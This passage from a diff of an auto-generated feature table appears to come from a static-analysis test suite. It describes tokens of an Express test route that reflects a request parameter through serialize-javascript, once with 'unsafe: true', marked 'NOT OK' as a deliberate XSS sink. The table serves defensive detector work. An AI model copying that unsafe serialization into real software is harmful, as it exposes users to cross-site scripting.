autogenerated/Xss/ReflectedXss/tst2.js:40:7:40:59 | serializeJavaScript | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:40:29:40:35 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:40:29:40:35 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:40:29:40:35 | require | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:40:29:40:59 | exceptional return of require ... cript') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:40:29:40:59 | exceptional return of require ... cript') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:40:29:40:59 | exceptional return of require ... cript') | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:40:29:40:59 | require ... cript') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:40:29:40:59 | require ... cript') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:40:29:40:59 | require ... cript') | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:40:37:40:58 | 'serial ... script' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/tst2.js:40:37:40:58 | 'serial ... script' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:40:37:40:58 | 'serial ... script' | calleeImports | | | autogenerated/Xss/ReflectedXss/tst2.js:40:37:40:58 | 'serial ... script' | contextFunctionInterfaces | | | autogenerated/Xss/ReflectedXss/tst2.js:40:37:40:58 | 'serial ... script' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/tst2.js:40:37:40:58 | 'serial ... script' | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:42:1:42:3 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:1:42:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:1:42:3 | app | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:42:1:42:7 | app.get | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:1:42:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:1:42:7 | app.get | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:42:1:52:2 | app.get ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:1:52:2 | app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:1:52:2 | app.get ... T OK\\n}) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:42:1:52:2 | exceptional return of app.get ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:1:52:2 | exceptional return of app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:1:52:2 | exceptional return of app.get ... T OK\\n}) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:42:5:42:7 | get | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:5:42:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:5:42:7 | get | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:42:9:42:14 | '/baz' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/tst2.js:42:9:42:14 | '/baz' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:42:9:42:14 | '/baz' | calleeImports | express | @@ -22021,6 +146681,26 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:42:9:42:14 | '/baz' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/tst2.js:42:9:42:14 | '/baz' | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:42:9:42:14 | '/baz' | receiverName | app | +| autogenerated/Xss/ReflectedXss/tst2.js:42:17:42:16 | serializeJavaScript | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:17:42:16 | serializeJavaScript | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:17:42:16 | serializeJavaScript | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:42:17:42:16 | serializeJavaScript | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:42:17:42:16 | serializeJavaScript | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:42:17:42:16 | this | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:17:42:16 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:17:42:16 | this | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:42:17:42:16 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:42:17:42:16 | this | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:42:17:52:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:17:52:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:17:52:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:42:17:52:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:42:17:52:1 | 'arguments' object of anonymous function | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:42:17:52:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:17:52:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:17:52:1 | exceptional return of anonymous function | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:42:17:52:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:42:17:52:1 | exceptional return of anonymous function | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:42:17:52:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/tst2.js:42:17:52:1 | functio ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/tst2.js:42:17:52:1 | functio ... OT OK\\n} | calleeImports | express | @@ -22028,6 +146708,111 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:42:17:52:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/tst2.js:42:17:52:1 | functio ... OT OK\\n} | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:42:17:52:1 | functio ... OT OK\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/tst2.js:42:17:52:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:17:52:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:17:52:1 | return of anonymous function | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:42:17:52:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:42:17:52:1 | return of anonymous function | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:42:26:42:28 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:26:42:28 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:26:42:28 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:26:42:28 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:42:26:42:28 | req | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:42:26:42:28 | req | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:42:26:42:28 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:42:26:42:28 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:42:26:42:28 | req | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:42:26:42:28 | req | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:42:31:42:33 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:31:42:33 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:31:42:33 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:42:31:42:33 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:42:31:42:33 | res | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:42:31:42:33 | res | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:42:31:42:33 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:42:31:42:33 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:42:31:42:33 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:42:31:42:33 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:43:7:43:11 | { p } | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:43:7:43:11 | { p } | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:43:7:43:11 | { p } | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:43:7:43:11 | { p } | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:43:7:43:11 | { p } | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:43:7:43:24 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:43:7:43:24 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:43:7:43:24 | p | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:43:7:43:24 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:43:7:43:24 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:43:7:43:24 | { p } = req.params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:43:7:43:24 | { p } = req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:43:7:43:24 | { p } = req.params | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:43:7:43:24 | { p } = req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:43:7:43:24 | { p } = req.params | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:43:9:43:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:43:9:43:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:43:9:43:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:43:9:43:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:43:9:43:9 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:43:9:43:9 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:43:9:43:9 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:43:9:43:9 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:43:9:43:9 | p | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:43:9:43:9 | p | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:43:9:43:9 | p | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:43:9:43:9 | p | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:43:9:43:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:43:9:43:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:43:9:43:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:43:9:43:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:43:9:43:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:43:9:43:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:43:9:43:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:43:9:43:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:43:15:43:17 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:43:15:43:17 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:43:15:43:17 | req | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:43:15:43:17 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:43:15:43:17 | req | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:43:15:43:24 | req.params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:43:15:43:24 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:43:15:43:24 | req.params | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:43:15:43:24 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:43:15:43:24 | req.params | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:43:19:43:24 | params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:43:19:43:24 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:43:19:43:24 | params | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:43:19:43:24 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:43:19:43:24 | params | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:45:7:45:16 | serialized | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:45:7:45:16 | serialized | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:45:7:45:16 | serialized | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:45:7:45:16 | serialized | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:45:7:45:16 | serialized | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:45:7:45:41 | seriali ... ript(p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:45:7:45:41 | seriali ... ript(p) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:45:7:45:41 | seriali ... ript(p) | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:45:7:45:41 | seriali ... ript(p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:45:7:45:41 | seriali ... ript(p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:45:7:45:41 | serialized | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:45:7:45:41 | serialized | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:45:7:45:41 | serialized | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:45:7:45:41 | serialized | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:45:7:45:41 | serialized | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:45:20:45:38 | serializeJavaScript | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:45:20:45:38 | serializeJavaScript | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:45:20:45:38 | serializeJavaScript | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:45:20:45:38 | serializeJavaScript | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:45:20:45:38 | serializeJavaScript | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:45:20:45:41 | exceptional return of seriali ... ript(p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:45:20:45:41 | exceptional return of seriali ... ript(p) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:45:20:45:41 | exceptional return of seriali ... ript(p) | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:45:20:45:41 | exceptional return of seriali ... ript(p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:45:20:45:41 | exceptional return of seriali ... ript(p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:45:20:45:41 | seriali ... ript(p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:45:20:45:41 | seriali ... ript(p) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:45:20:45:41 | seriali ... ript(p) | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:45:20:45:41 | seriali ... ript(p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:45:20:45:41 | seriali ... ript(p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:45:40:45:40 | p | CalleeFlexibleAccessPath | serializeJavaScript | | autogenerated/Xss/ReflectedXss/tst2.js:45:40:45:40 | p | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:45:40:45:40 | p | calleeImports | serialize-javascript | @@ -22036,6 +146821,31 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:45:40:45:40 | p | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | | autogenerated/Xss/ReflectedXss/tst2.js:45:40:45:40 | p | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/tst2.js:45:40:45:40 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:47:3:47:5 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:47:3:47:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:47:3:47:5 | res | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:47:3:47:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:47:3:47:5 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:47:3:47:10 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:47:3:47:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:47:3:47:10 | res.send | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:47:3:47:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:47:3:47:10 | res.send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:47:3:47:22 | exceptional return of res.send(serialized) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:47:3:47:22 | exceptional return of res.send(serialized) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:47:3:47:22 | exceptional return of res.send(serialized) | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:47:3:47:22 | exceptional return of res.send(serialized) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:47:3:47:22 | exceptional return of res.send(serialized) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:47:3:47:22 | res.send(serialized) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:47:3:47:22 | res.send(serialized) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:47:3:47:22 | res.send(serialized) | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:47:3:47:22 | res.send(serialized) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:47:3:47:22 | res.send(serialized) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:47:7:47:10 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:47:7:47:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:47:7:47:10 | send | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:47:7:47:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:47:7:47:10 | send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:47:12:47:21 | serialized | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/tst2.js:47:12:47:21 | serialized | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:47:12:47:21 | serialized | contextFunctionInterfaces | | @@ -22044,6 +146854,36 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:47:12:47:21 | serialized | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/tst2.js:47:12:47:21 | serialized | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:47:12:47:21 | serialized | receiverName | res | +| autogenerated/Xss/ReflectedXss/tst2.js:49:7:49:12 | unsafe | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:49:7:49:12 | unsafe | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:49:7:49:12 | unsafe | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:49:7:49:12 | unsafe | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:49:7:49:12 | unsafe | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:49:7:49:53 | unsafe | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:49:7:49:53 | unsafe | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:49:7:49:53 | unsafe | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:49:7:49:53 | unsafe | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:49:7:49:53 | unsafe | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:49:7:49:53 | unsafe ... true}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:49:7:49:53 | unsafe ... true}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:49:7:49:53 | unsafe ... true}) | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:49:7:49:53 | unsafe ... true}) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:49:7:49:53 | unsafe ... true}) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:49:16:49:34 | serializeJavaScript | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:49:16:49:34 | serializeJavaScript | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:49:16:49:34 | serializeJavaScript | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| 